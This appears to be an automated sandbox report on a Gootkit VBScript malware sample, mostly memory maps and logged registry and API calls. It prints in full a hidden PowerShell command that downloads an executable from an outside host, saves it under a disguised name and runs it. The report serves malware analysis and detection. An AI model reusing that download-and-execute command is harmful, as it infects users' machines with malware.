6ded37a61962a6a6626bd47adb66f5f73742d8d2125cdff1dc3f932d0a8e5d2e (SHA256)
gootkit_vbs-6ded37a6.vir.vbs
VBScript
Created at 2018-12-13 14:00:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "29 minutes, 45 seconds" to "1 minute, 40 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Sequential View
Process #1: cscript.exe
92
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\windows\system32\cscript.exe |
| Command Line | "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:23, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:07, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd40 |
| Parent PID | 0x84c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D50
0x
E78
0x
F20
0x
F3C
0x
F74
0x
F88
0x
FA8
0x
FBC
0x
FD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000017eec80000 | 0x17eec80000 | 0x17eed7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017eee00000 | 0x17eee00000 | 0x17eeffffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef000000 | 0x17ef000000 | 0x17ef0fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef100000 | 0x17ef100000 | 0x17ef1fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef200000 | 0x17ef200000 | 0x17ef2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef300000 | 0x17ef300000 | 0x17ef3fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef400000 | 0x17ef400000 | 0x17ef4fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef500000 | 0x17ef500000 | 0x17ef5fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef600000 | 0x17ef600000 | 0x17ef6fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef700000 | 0x17ef700000 | 0x17ef7fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000128811e0000 | 0x128811e0000 | 0x128811fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000128811e0000 | 0x128811e0000 | 0x128811effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000128811f0000 | 0x128811f0000 | 0x128811f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881200000 | 0x12881200000 | 0x12881214fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881220000 | 0x12881220000 | 0x12881223fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881230000 | 0x12881230000 | 0x12881230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000012881240000 | 0x12881240000 | 0x12881241fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x12881250000 | 0x1288130dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881310000 | 0x12881310000 | 0x12881316fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881320000 | 0x12881320000 | 0x12881321fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881330000 | 0x12881330000 | 0x12881330fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000012881340000 | 0x12881340000 | 0x12881340fff | Private Memory | rw |
|
|
|
- |
| private_0x0000012881350000 | 0x12881350000 | 0x12881350fff | Private Memory | rw |
|
|
|
- |
| cscript.exe | 0x12881360000 | 0x12881368fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881370000 | 0x12881370000 | 0x1288146ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x12881470000 | 0x1288154cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881470000 | 0x12881470000 | 0x1288159ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881470000 | 0x12881470000 | 0x12881470fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881470000 | 0x12881470000 | 0x1288152bfff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881530000 | 0x12881530000 | 0x12881533fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881540000 | 0x12881540000 | 0x12881540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881550000 | 0x12881550000 | 0x12881550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881560000 | 0x12881560000 | 0x1288157cfff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000012881560000 | 0x12881560000 | 0x1288156ffff | Private Memory | rw |
|
|
|
- |
| vbscript.dll | 0x12881570000 | 0x12881581fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881590000 | 0x12881590000 | 0x1288159ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000128815a0000 | 0x128815a0000 | 0x128815affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000128815b0000 | 0x128815b0000 | 0x12881737fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881740000 | 0x12881740000 | 0x128818c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000128818d0000 | 0x128818d0000 | 0x12882ccffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012882cd0000 | 0x12882cd0000 | 0x128830cafff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x128830d0000 | 0x12883406fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883410000 | 0x12883410000 | 0x1288440ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000012883410000 | 0x12883410000 | 0x1288350ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000012883510000 | 0x12883510000 | 0x1288360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000012883610000 | 0x12883610000 | 0x1288380ffff | Private Memory | rw |
|
|
|
- |
| wshom.ocx | 0x12883810000 | 0x12883822fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883830000 | 0x12883830000 | 0x12883830fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x12883840000 | 0x12883843fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db | 0x12883850000 | 0x12883863fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883870000 | 0x12883870000 | 0x12883870fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x12883880000 | 0x128838c4fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x128838d0000 | 0x128838d3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x128838e0000 | 0x1288396dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883970000 | 0x12883970000 | 0x12883970fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000012884410000 | 0x12884410000 | 0x1288442cfff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007df5ff030000 | 0x7df5ff030000 | 0x7ff5ff02ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6c3460000 | 0x7ff6c3460000 | 0x7ff6c355ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6c3560000 | 0x7ff6c3560000 | 0x7ff6c3582fff | Pagefile Backed Memory | r |
|
|
|
- |
| cscript.exe | 0x7ff6c3d30000 | 0x7ff6c3d5efff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x7ffbf8e90000 | 0x7ffbf8f28fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x7ffbf9eb0000 | 0x7ffbf9ee4fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x7ffbfae30000 | 0x7ffbfae58fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x7ffbfae60000 | 0x7ffbfaea3fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x7ffbfbb40000 | 0x7ffbfbb5dfff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x7ffc02db0000 | 0x7ffc02dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7ffc071a0000 | 0x7ffc07357fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc07370000 | 0x7ffc07379fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc0a0b0000 | 0x7ffc0a0cafff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x7ffc0aaa0000 | 0x7ffc0aaabfff | Memory Mapped File | rwx |
|
|
|
- |
| amsi.dll | 0x7ffc0b3d0000 | 0x7ffc0b3dffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc0bc60000 | 0x7ffc0bfe1fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc0f200000 | 0x7ffc0f692fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffc0fcd0000 | 0x7ffc0fcf1fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc101d0000 | 0x7ffc10355fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc10810000 | 0x7ffc108a5fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc11260000 | 0x7ffc11293fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc115d0000 | 0x7ffc115e6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc116f0000 | 0x7ffc116fafff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc118d0000 | 0x7ffc118fcfff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc11ae0000 | 0x7ffc11b78fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc11b80000 | 0x7ffc11ba8fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc11c50000 | 0x7ffc11c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc11c60000 | 0x7ffc11caafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc11cb0000 | 0x7ffc11cc3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc11cd0000 | 0x7ffc11cdefff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc11d00000 | 0x7ffc11ec6fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc11f60000 | 0x7ffc125a3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc125b0000 | 0x7ffc12664fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc12670000 | 0x7ffc126d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc126e0000 | 0x7ffc12722fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffc12730000 | 0x7ffc12784fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc12840000 | 0x7ffc12a27fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc12a30000 | 0x7ffc12ad6fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc12ae0000 | 0x7ffc12c39fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc12c40000 | 0x7ffc1419efff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc141a0000 | 0x7ffc14325fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc145f0000 | 0x7ffc1469cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14700000 | 0x7ffc1481bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc14820000 | 0x7ffc1485afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc14860000 | 0x7ffc148b1fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc148c0000 | 0x7ffc14b3cfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc14bb0000 | 0x7ffc14cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc14d10000 | 0x7ffc14e65fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc152a0000 | 0x7ffc15360fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x7ffc15410000 | 0x7ffc1547efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc15480000 | 0x7ffc154dafff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc154e0000 | 0x7ffc15586fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc15590000 | 0x7ffc1562cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
Threads
Thread 0xd50
91
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff6c3d30000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc145f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc14613270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 192, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 192, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 192, type = REG_NONE |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc145f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffc14617430 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\cscript.exe, process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 110 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\.vbs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\.vbs, data = VBSFile, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine, data = VBScript, type = REG_SZ |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc145f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffc128b02d0 |
|
1 | |
| Module | Load | module_name = amsi.dll, base_address = 0x7ffc0b3d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffc0b3d2260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffc0b3d26b0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffc12840000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffc1289f670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffc12901540 |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 113890 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, filename = C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, protection = PAGE_READONLY, maximum_size = 117543 |
|
1 | |
| Module | Map | C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cscript.exe |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x7ffc02db0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffc02db1010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wldp.dll, function = WldpIsClassInApprovedList, address_out = 0x7ffc02db37b0 |
|
1 | |
| System | Get Info | type = System Directory |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffc154e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7ffc154eac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7ffc154f2db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7ffc154f6290 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | type = size |
|
1 | |
| File | Read | size = 117543, size_out = 117543 |
|
1 | |
| COM | Create | interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff6c3d30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\cscript.exe, function = 1, address_out = 0x7ff6c3d31250 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x7ffc12c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7ffc12d46c70 |
|
1 | |
| Process | Create | process_name = powershell, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 |
Thread 0xf20
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Window | Create | class_name = WSH-Timer, wndproc_parameter = 1273480484720 |
|
1 |
Process #3: powershell.exe
2184
3
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $svabjzvv = New-Object -ComObject Msxml2.XMLHTTP; $iadjti = New-Object -ComObject ADODB.Stream; $iyfigisyb = $env:temp + '\SMSvcHost32.exe';$svabjzvv.open('GET', 'http://amd.martatovaglieri.it/upll?26201', $false);$svabjzvv.send(); if($svabjzvv.Status -eq "200"){$iadjti.open();$iadjti.type = 1;$iadjti.write($svabjzvv.responseBody);$iadjti.position = 0;$iadjti.savetofile($iyfigisyb);$iadjti.close();} Start-Process $iyfigisyb; |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:01:04, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xff8 |
| Parent PID | 0xd40 (c:\windows\system32\cscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
FF4
0x
CD4
0x
BF8
0x
CCC
0x
E34
0x
E4C
0x
E54
0x
E58
0x
FA0
0x
2DC
0x
A8C
0x
F50
0x
B6C
0x
B70
0x
EC0
0x
ED4
0x
624
0x
DBC
0x
7F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000184b200000 | 0x184b200000 | 0x184b3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b400000 | 0x184b400000 | 0x184b47ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b480000 | 0x184b480000 | 0x184b4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b500000 | 0x184b500000 | 0x184b57ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b580000 | 0x184b580000 | 0x184b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b600000 | 0x184b600000 | 0x184b67ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b680000 | 0x184b680000 | 0x184b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150452d0000 | 0x150452d0000 | 0x150452effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000150452d0000 | 0x150452d0000 | 0x150452dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000150452e0000 | 0x150452e0000 | 0x150452e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000150452f0000 | 0x150452f0000 | 0x15045304fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045310000 | 0x15045310000 | 0x15045313fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045320000 | 0x15045320000 | 0x15045320fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000015045330000 | 0x15045330000 | 0x15045331fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x15045340000 | 0x150453fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045400000 | 0x15045400000 | 0x15045406fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045410000 | 0x15045410000 | 0x15045411fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045420000 | 0x15045420000 | 0x15045420fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x15045430000 | 0x15045432fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045440000 | 0x15045440000 | 0x15045440fff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045450000 | 0x15045450000 | 0x15045450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045460000 | 0x15045460000 | 0x15045466fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045470000 | 0x15045470000 | 0x15045470fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000015045480000 | 0x15045480000 | 0x1504548ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000015045490000 | 0x15045490000 | 0x1504549ffff | Private Memory | - |
|
|
|
- |
| private_0x00000150454a0000 | 0x150454a0000 | 0x150454a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454b0000 | 0x150454b0000 | 0x150454b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454c0000 | 0x150454c0000 | 0x150454cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454d0000 | 0x150454d0000 | 0x150455cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150455d0000 | 0x150455d0000 | 0x150455dffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x150455e0000 | 0x150455e4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x150455f0000 | 0x150455fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045600000 | 0x15045600000 | 0x1504560ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000015045610000 | 0x15045610000 | 0x1504561ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045620000 | 0x15045620000 | 0x1504568ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x15045690000 | 0x150456f1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000015045700000 | 0x15045700000 | 0x15045700fff | Pagefile Backed Memory | rw |
|
|
|
- |
